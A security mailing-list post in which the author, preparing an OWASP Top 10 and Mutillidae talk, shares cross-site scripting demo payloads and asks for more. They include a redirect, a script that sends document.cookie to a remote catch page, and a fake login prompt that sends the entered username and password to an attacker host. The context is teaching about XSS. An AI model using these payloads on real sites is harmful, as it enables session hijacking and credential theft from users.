Ok, I've got yet another presentation coming up, this time on the OWASP Top
10 and Mutillidae. One of the things I'm going to cover is XSS. The
canonical example of course is:
<script>alert("XSS");</script>
but that is boring, and gives folks the impression that XSS is not that
serious. Better short eample swoul be:
*Redirect traffic to your site:*
<script>window.location = "http://www.irongeek.com/";</script>
*A little cookie Grabbing:*
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie=
"+encodeURI(document.cookie);
</script>
*
Or maybe a password form to make people think they have to login, but it
just grabs the credentials:*
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username=
"+username+"&password="+password+"\">");
</script>
What are other cool thing to inject, besides maybe BeEF, that shows of how
XSS can be a big deal?
Thanks,
Adrian
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
